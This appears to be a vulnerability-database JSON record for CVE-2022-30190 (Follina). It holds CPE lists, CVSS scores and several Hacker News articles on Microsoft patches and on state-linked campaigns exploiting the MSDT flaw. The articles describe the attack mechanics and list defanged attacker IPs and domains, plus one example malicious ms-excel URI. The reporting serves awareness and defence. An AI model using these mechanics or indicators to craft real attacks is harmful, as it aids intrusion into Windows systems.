"cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2022-30190", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-30190", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}], "thn": [{"lastseen": "2022-08-11T10:01:52", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgzvxB2K_EqWauP8RXXDGq8L8wGV4BI0Hng-GkPQGun_flvTywSZzmrfPAZGEHV9NomsUUWuONQ52aAAzOwgK8sxLTUgtdoQKwqrW76TtntBfvotW8Mfjv3CmeeU9Y-EKc7DfEq1XpzFrQCH0z6Yusx4f24nFKK1y4MNbsku2j_Rz-7d-Zk32cfR8pQ/s728-e100/patch-tuesday.jpg>)\n\nAs many as [121 new security flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Aug>) were patched by Microsoft as part of its Patch Tuesday updates for the month of August, which also includes a fix for a Support Diagnostic Tool vulnerability that the company said is being actively exploited in the wild.\n\nOf the 121 bugs, 17 are rated Critical, 102 are rated Important, one is rated Moderate, and one is rated Low in severity. Two of the issues have been listed as publicly known at the time of the release.\n\nIt's worth noting that the 121 security flaws are in addition to [25 shortcomings](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) the tech giant addressed in its Chromium-based Edge browser late last month and the previous week.\n\nTopping the list of patches is [CVE-2022-34713](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34713>) (CVSS score: 7.8), a case of remote code execution affecting the Microsoft Windows Support Diagnostic Tool (MSDT), making it the second flaw in the same component after [Follina](<https://thehackernews.com/2022/07/hackers-exploiting-follina-bug-to.html>) (CVE-2022-30190) to be weaponized in [real-world attacks](<https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia/>) within three months.\n\nThe vulnerability is also said to be a variant of the flaw publicly known as [DogWalk](<https://thehackernews.com/2022/06/researchers-warn-of-unpatched-dogwalk.html>), which was originally disclosed by security researcher Imre Rad in January 2020.\n\n\"Exploitation of the vulnerability requires that a user open a specially crafted file,\" Microsoft said in an advisory. \"In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file.\"\n\nAlternatively, an attacker could host a website or leverage an already compromised site that contains a malware-laced file designed to exploit the vulnerability, and then trick potential targets into clicking on a link in an email or an instant message to open the document.\n\n\"This is not an uncommon vector and malicious documents and links are still used by attackers to great effect,\" Kev Breen, director of cyber threat research at Immersive Labs, said. \"It underscores the need for upskilling employees to be wary of such attacks.\"\n\nCVE-2022-34713 is one of the two remote code execution flaws in MSDT closed by Redmond this month, the other being [CVE-2022-35743](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35743>) (CVSS score: 7.8). Security researchers Bill Demirkapi and Matt Graeber have been credited with reporting the vulnerability.\n\nMicrosoft also resolved three privilege escalation flaws in Exchange Server that could be abused to read targeted email messages and download attachments ([CVE-2022-21980](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21980>), [CVE-2022-24477](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24477>), and [CVE-2022-24516](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24516>)) and one publicly-known information disclosure vulnerability ([CVE-2022-30134](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30134>)) in Exchange which could as well lead to the same impact.\n\n\"Administrators should enable [Extended Protection](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-august-2022-exchange-server-security-updates/ba-p/3593862>) in order to fully remediate this vulnerability,\" Greg Wiseman, product manager at Rapid7, commented about CVE-2022-30134.\n\nThe security update further remediates multiple remote code execution flaws in Windows Point-to-Point Protocol (PPP), Windows Secure Socket Tunneling Protocol (SSTP), Azure RTOS GUIX Studio, Microsoft Office, and Windows Hyper-V.\n\nThe Patch Tuesday fix is also notable for addressing dozens of privilege escalation flaws: 31 in Azure Site Recovery, a month after Microsoft [squashed 30 similar bugs](<https://thehackernews.com/2022/07/microsoft-releases-fix-for-zero-day.html>) in the business continuity service, five in Storage Spaces Direct, three in Windows Kernel, and two in the Print Spooler module.\n\n### Software Patches from Other Vendors\n\nAside from Microsoft, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [AMD](<https://www.amd.com/en/corporate/product-security>)\n * [Android](<https://source.android.com/security/bulletin/2022-08-01>)\n * [Apache Projects](<https://blogs.apache.org/foundation/date/20220805>)\n * [Cisco](<https://thehackernews.com/2022/08/cisco-business-routers-found-vulnerable.html>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [F5](<https://support.f5.com/csp/article/K14649763>)\n * [Fortinet](<https://www.fortiguard.com/psirt?date=08-2022>)\n * [GitLab](<https://about.gitlab.com/releases/2022/07/28/security-release-gitlab-15-2-1-released/>)\n * [Google Chrome](<https://chromereleases.googleblog.com/2022/08/stable-channel-update-for-desktop.html>)\n * [HP](<https://support.hp.com/us-en/security-bulletins>)\n * [IBM](<https://www.ibm.com/blogs/psirt/>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/August-2022>)\n * [NVIDIA](<https://www.nvidia.com/en-us/security/>)\n * [Palo Alto Networks](<https://security.paloaltonetworks.com/>)\n * [Qualcomm](<https://docs.qualcomm.com/product/publicresources/securitybulletin/august-2022-bulletin.html>)\n * [Samba](<https://www.samba.org/samba/history/>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-10T06:12:00", "type": "thn", "title": "Microsoft Issues Patches for 121 Flaws, Including Zero-Day Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21980", "CVE-2022-24477", "CVE-2022-24516", "CVE-2022-30134", "CVE-2022-30190", "CVE-2022-34713", "CVE-2022-35743"], "modified": "2022-08-11T08:22:02", "id": "THN:6C7E32993558CB9F19CAE15C18522582", "href": "https://thehackernews.com/2022/08/microsoft-issues-patches-for-121-flaws.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-07T15:35:06", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjWMKOvweSFs-6_yTKhS8Ei2IBg2vcJuX9wiigmwmv2hOkJWeIzjBRPZIGuCENyJ3ZhGbdw4r7S79Z_QdBYo0oVXNm1oL_JGsK3zHlILQmiu3OHiuBKqzhrFWj-vyyCk813l8T4dSdgnOz-c05mTwyfEA0pwW8cRr31kStWCgi_TDxMXnmMfDgheC7X/s728-e100/windows.jpg>)\n\nA suspected state-aligned threat actor has been attributed to a new set of attacks exploiting the Microsoft Office \"Follina\" vulnerability to target government entities in Europe and the U.S.\n\nEnterprise security firm Proofpoint said it blocked attempts at exploiting the remote code execution flaw, which is being tracked as [CVE-2022-30190](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>) (CVSS score: 7.8). No less than 1,000 phishing messages containing a lure document were sent to the targets.\n\n\"This campaign masqueraded as a salary increase and utilized an RTF with the exploit payload downloaded from 45.76.53[.]253,\" the company [said](<https://twitter.com/threatinsight/status/1532830739208732673>) in a series of tweets.\n\nThe payload, which manifests in the form of a PowerShell script, is Base64-encoded and functions as a downloader to retrieve a second PowerShell script from a remote server named \"seller-notification[.]live.\"\n\n\"This script checks for virtualization, steals information from local browsers, mail clients and file services, conducts machine recon and then zips it for exfil[tration] to 45.77.156[.]179,\" the company added.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiF_m7_KsHBbfl6j9PPTd8t5DZ4_iAR6cG5PWwiqwiHn_YkdsXkjr3qRPs83Oje0Y5pqaKc2zav2Crnq-KH0HGQpBeKMWZaR8dtf2akXuHmO8cwk7tpkBX5uKcHjq5az14xOsPTCFUi71Lo2E4DebsFoKvV-d0ML_UZr_ap7hkNoBGdGo3Q4L6VVWgs/s728-e100/hacking.jpg>)\n\nThe phishing campaign has not been linked to a previously known group, but said it was mounted by a nation-state actor based on the specificity of the targeting and the PowerShell payload's wide-ranging reconnaissance capabilities.\n\nThe development follows [active exploitation attempts](<https://thehackernews.com/2022/05/chinese-hackers-begin-exploiting-latest.html>) by a Chinese threat actor tracked as TA413 to deliver weaponized ZIP archives with malware-rigged Microsoft Word documents.\n\nThe Follina vulnerability, which leverages the \"ms-msdt:\" protocol URI scheme to remotely take control of target devices, remains unpatched, with Microsoft urging customers to [disable the protocol](<https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html>) to prevent the attack vector.\n\nIn the absence of a security update, 0patch has released an [unofficial fix](<https://blog.0patch.com/2022/06/free-micropatches-for-follina-microsoft.html>) to block ongoing attacks against Windows systems that target the Microsoft Windows Support Diagnostic Tool (MSDT) vulnerability.\n\n\"It doesn't matter which version of Office you have installed, or if you have Office installed at all: the vulnerability could also be exploited through [other attack vectors](<https://twitter.com/0xBacco/status/1531599168363548672>),\" 0patch's Mitja Kolsek said.\n\n\"Proofpoint continues to see targeted attacks leveraging CVE-2022-30190,\" Sherrod DeGrippo, vice president of threat research, said in a statement shared with The Hacker News.\n\n\"The extensive reconnaissance conducted by the second PowerShell script demonstrates an actor interested in a large variety of software on a target's computer. This, coupled with the tight targeting of European government and local U.S. governments, led us to suspect this campaign has a state aligned nexus.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-06T02:54:00", "type": "thn", "title": "State-Backed Hackers Exploit Microsoft 'Follina' Bug to Target Entities in Europe and U.S", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-07T12:27:16", "id": "THN:21FC29F7D7C7E2DA7D2F19E89085FD55", "href": "https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-31T17:56:10", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh4XDd5jxlShcQhkpFMeDWuIXh2lmuW6g-pOpYsWcAxsVQeXRD_zrP4VSvk676NwsbCPmQ3N8RbQ0Ox5emUCLWdANDTfkxyX8ZNmIeOx8--iO40HnXyGESjApgsZEkN1p7JZLQWLLVJ3imK_5umSJiUUWXduvPJeQ_nLWxfSUN92U64HfLhpAUbxKty/s728-e100/Windows-Update.jpg>)\n\nMicrosoft on Monday published guidance for a newly discovered [zero-day security flaw](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>) in its Office productivity suite that could be exploited to achieve code execution on affected systems.\n\nThe weakness, now assigned the identifier [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>), is rated 7.8 out of 10 for severity on the CVSS vulnerability scoring system. Microsoft Office versions Office 2013, Office 2016, Office 2019, and Office 2021, as well as Professional Plus editions, are impacted. \n\n\"To help protect customers, we've published CVE-2022-30190 and additional guidance [here](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>),\" a Microsoft spokesperson told The Hacker News in an emailed statement.\n\nThe [Follina](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>) vulnerability, which came to light late last week, involved a real-world exploit that leveraged the shortcoming in a weaponized Word document to execute arbitrary PowerShell code by making use of the \"ms-msdt:\" URI scheme. The sample was uploaded to VirusTotal from Belarus.\n\nBut first signs of exploitation of the flaw date back to April 12, 2022, when a second sample was uploaded to the malware database. This artifact is believed to have targeted users in Russia with a malicious Word document (\"[\u043f\u0440\u0438\u0433\u043b\u0430\u0448\u0435\u043d\u0438\u0435 \u043d\u0430 \u0438\u043d\u0442\u0435\u0440\u0432\u044c\u044e.doc](<https://www.virustotal.com/gui/file/710370f6142d945e142890eb427a368bfc6c5fe13a963f952fb884c38ef06bfa/detection/>)\") that masqueraded as an interview invitation with Sputnik Radio.\n\n\"A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,\" Microsoft said in an advisory for CVE-2022-30190.\n\n\"An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user's rights.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjDwwcRQQLel_buVz-cP2D87KQ9SRU9AxTyvKVy-yD0XyMjUWUJFIiu7fTBhtdu6J7nG76FktwEvqkjodphqnX--IwjAE_tEPQTVOrmlwWn6clHVQN0Ff7NvAu4wTmjsB3-cqjcU7OCOKQCCRGIY7JfsIBzOdqeZZ0DGfE37Z640iuKSDL2OtIBiu2q/s728-e100/hacking.jpg>)\n\nThe tech giant credited crazyman, a member of the [Shadow Chaser Group](<https://twitter.com/ShadowChasing1>), for reporting the flaw on April 12, coinciding with the discovery of the in-the-wild exploit targeting Russian users, indicating the company had been already aware of the vulnerability.\n\nIndeed, according to [screenshots](<https://twitter.com/CrazymanArmy/status/1531117401181671430>) shared by the researcher on Twitter, Microsoft closed the vulnerability submission report on April 21, 2022 stating \"the issue has been fixed,\" while also dismissing the flaw as \"not a security issue\" since it requires a passkey provided by a support technician when starting the diagnostic tool.\n\nBesides releasing detection rules for Microsoft Defender for Endpoint, the Redmond-based company has offered workarounds in its guidance to disable the MSDT URL protocol via a Windows Registry modification.\n\n\"If the calling application is a Microsoft Office application, by default, Microsoft Office opens documents from the internet in Protected View or Application Guard for Office, both of which prevent the current attack,\" Microsoft said.\n\nThis is not the first time Microsoft Office protocol schemes like \"ms-msdt:\" have come under the scanner for their potential misuse. Earlier this January, German cybersecurity company SySS [disclosed](<https://blog.syss.com/posts/abusing-ms-office-protos/>) how it's possible to open files directly via specially crafted URLs such as \"ms-excel:ofv|u|https://192.168.1.10/poc[.]xls.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-05-31T05:12:00", "type": "thn", "title": "Microsoft Releases Workarounds for Office Vulnerability Under Active Exploitation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-31T17:53:19", "id": "THN:1EFEC00D867275514EA180819C9EF104", "href": "https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-21T03:59:01", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEi1QE9YZxJQ6JKfU-Sykp9EhrAHv5DKf6S7qEofv-1kjCV8SamqdavCZcQ9VYRPBJo1Hyb0S2mD1SzfQulPeSx9sUm-eGvZsNXCn3qcQMfYMkYO8fsqBA53p-o42rQ4uqGeyzkO1_9XItfMG_wGq3g7TdYI8GR62vky7GemJ7dthWmKIEfPcKK9qnSB/s728-e100/russian-ddos-app.jpg>)\n\nRussian threat actors capitalized on the [ongoing conflict](<https://thehackernews.com/2022/07/trickbot-malware-shifted-its-focus-on.html>) against Ukraine to distribute Android malware camouflaged as an app for pro-Ukrainian hacktivists to launch distributed denial-of-service (DDoS) attacks against Russian sites.\n\nGoogle Threat Analysis Group (TAG) attributed the malware to Turla, an advanced persistent threat also known as Krypton, Venomous Bear, Waterbug, and Uroburos, and linked to Russia's Federal Security Service (FSB).\n\n\"This is the first known instance of Turla distributing Android-related malware,\" TAG researcher Billy Leonard [said](<https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag/>). \"The apps were not distributed through the Google Play Store, but hosted on a domain controlled by the actor and disseminated via links on third party messaging services.\"\n\nIt's worth noting that the [onslaught ](<https://thehackernews.com/2022/04/microsoft-documents-over-200.html>)of [cyberattacks](<https://thehackernews.com/2022/05/ukraine-war-themed-files-become-lure-of.html>) in the immediate aftermath of Russia's unprovoked invasion of Ukraine prompted the latter to [form an IT Army](<https://thehackernews.com/2022/03/both-sides-in-russia-ukraine-war.html>) to stage counter-DDoS attacks against Russian websites. The goal of the Turla operation, it appears, is to use this volunteer-run effort to their own advantage.\n\nThe [decoy app](<https://www.virustotal.com/gui/file/3c62b24594ec3cacc14bdca068a0277e855967210e92c2c17bcf7c7d0d6b782a/>) was hosted on a domain masquerading as the [Azov Regiment](<https://en.wikipedia.org/wiki/Azov_Regiment>), a unit of the National Guard of Ukraine, calling on people from around the world to fight \"Russia's aggression\" by initiating a denial-of-service attack on the web servers belonging to \"Russian websites to overwhelm their resources.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiJ03kkaYUTLinMlQQz9I43ISthyqrTsZa75Jlni48jqqkGuc8ZTNgQMW3J6DvBUkZBOOrTkzlYHoElomW1W2LTMHy5QvZHhM2i_P6XtJ-70QN_PZXzVWj9_4V5J0bvq0G3TNEsYBJTSSUU85A4Dw6EEZ0G74kPK5rSl_NODuMPTwbdTMDoREPAW_qb/s728-e100/android-ddos.jpg>)\n\nGoogle TAG said the actors drew inspiration from another Android app distributed through a website named \"stopwar[.]pro\" that's also designed to conduct DoS attacks by continually sending requests to the target websites.\n\nThat said, the actual number of times the malicious Cyber Azov app was installed is minuscule, posing no major impact on Android users.\n\nAdditionally, the Sandworm group (aka Voodoo Bear) has been connected to a separate set of malicious activities leveraging the [Follina vulnerability](<https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html>) (CVE-2022-30190) in the Microsoft Windows Support Diagnostic Tool (MSDT) to send links pointing to Microsoft Office documents hosted on compromised websites targeting media entities in Ukraine.\n\nUAC-0098, a threat actor that CERT-UA last month warned of [distributing tax-themed documents](<https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html>) carrying a Follina exploit, has also been assessed to be a former initial access broker with ties to the [Conti group](<https://thehackernews.com/2022/04/gold-ulrick-hackers-still-in-action.html>) and in charge of disseminating the IcedID banking trojan.\n\nOther kinds of cyber activity include credential phishing attacks mounted by an adversary referred to as COLDRIVER (aka Callisto) aimed at government and defense officials, politicians, NGOs and think tanks, and journalists.\n\nThese involve sending emails either directly, including the phishing domain or containing links to documents hosted on Google Drive and Microsoft OneDrive that, in turn, feature links to an attacker-controlled website designed to steal passwords.\n\nThe [latest developments](<https://thehackernews.com/2022/07/russian-hackers-using-dropbox-and.html>) are yet another indication of how Russian threat actors are exhibiting continued signs of increasing sophistication in their attempts to target in ways that highlight their evolving techniques.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-20T05:58:00", "type": "thn", "title": "Russian Hackers Tricked Ukrainians with Fake \"DoS Android Apps to Target Russia\" \u2014 The Hacker News", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-21T03:06:16", "id": "THN:7A6D54BC76D090840197DDF871D59731", "href": "https://thehackernews.com/2022/07/russian-hackers-tricked-ukrainians-with.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-01T11:56:12", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiUNLbMQKFGJkk_0MuvTZUsbdZk7Mwzi1ubRnWBoCLxeBkICJ8W6xX9SHPsYas7bLDtqj4wO1lZsmsxuPuAxkocOzNUvBMbOmM2yJIGg2t7CnMv5yAaUiSHpTbdt9nsHappGPYR_oG1nild6RLvcMvaILplweROkw7HFZp7QvCAE_V31Ku-G5wnnnZq/s728-e100/office.jpg>)\n\nAn advanced persistent threat (APT) actor aligned with Chinese state interests has been observed weaponizing the new [zero-day flaw](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>) in Microsoft Office to achieve code execution on affected systems.\n\n\"TA413 CN APT spotted [in-the-wild] exploiting the Follina zero-day using URLs to deliver ZIP archives which contain Word Documents that use the technique,\" enterprise security firm Proofpoint [said](<https://twitter.com/threatinsight/status/1531688214993555457>) in a tweet.\n\n\"Campaigns impersonate the 'Women Empowerments Desk' of the Central Tibetan Administration and use the domain tibet-gov.web[.]app.\"\n\n[TA413](<https://malpedia.caad.fkie.fraunhofer.de/actor/ta413>) is best known for its campaigns aimed at the Tibetan diaspora to deliver implants such as [Exile RAT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.exilerat>) and [Sepulcher](<https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher>) as well as a rogue Firefox browser extension dubbed [FriarFox](<https://thehackernews.com/2021/02/chinese-hackers-using-firefox-extension.html>).\n\nThe high-severity security flaw, dubbed Follina and tracked as CVE-2022-30190 (CVSS score: 7.8), relates to a case of remote code execution that abuses the \"ms-msdt:\" protocol URI scheme to execute arbitrary code.\n\nSpecifically, the attack makes it possible for threat actors to circumvent [Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) safeguards for suspicious files by simply changing the document to a Rich Text Format (RTF) file, thereby allowing the injected code to be run without even opening the document via the [Preview Pane](<https://docs.microsoft.com/en-us/windows/powertoys/file-explorer>) in Windows File Explorer.\n\nWhile the bug gained widespread attention last week, evidence points to active exploitation of the diagnostic tool flaw in real-world attacks targeting Russian users over a month ago on April 12, 2022, when it was disclosed to Microsoft.\n\nThe company, however, [did not deem it a security issue](<https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html>) and closed the vulnerability submission report, citing reasons that the MSDT utility requires a [passkey](<https://social.technet.microsoft.com/wiki/contents/articles/30458.windows-10-ctp-how-to-run-microsoft-support-diagnostic-tool.aspx#How_shall_I_get_the_Passkey>) provided by a support technician before it can execute payloads.\n\nThe vulnerability exists in all currently supported Windows versions and can be exploited via Microsoft Office versions Office 2013 through Office 21 and Office Professional Plus editions.\n\n\"This elegant attack is designed to bypass security products and fly under the radar by leveraging Microsoft Office's remote template feature and the ms-msdt protocol to execute malicious code, all without the need for macros,\" Malwarebytes' Jerome Segura [noted](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/>).\n\nAlthough there is no official patch available at this point, Microsoft has [recommended](<https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html>) disabling the MSDT URL protocol to prevent the attack vector. Additionally, it's been [advised](<https://twitter.com/wdormann/status/1531259406624620544>) to turn off the Preview Pane in File Explorer.\n\n\"What makes 'Follina' stand out is that this exploit does not take advantage of Office macros and, therefore, it works even in environments where macros have been disabled entirely,\" Nikolas Cemerikic of Immersive Labs said.\n\n\"All that's required for the exploit to take effect is for a user to open and view the Word document, or to view a preview of the document using the Windows Explorer Preview Pane. Since the latter does not require Word to launch fully, this effectively becomes a zero-click attack.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-06-01T06:02:00", "type": "thn", "title": "Chinese Hackers Begin Exploiting Latest Microsoft Office Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": 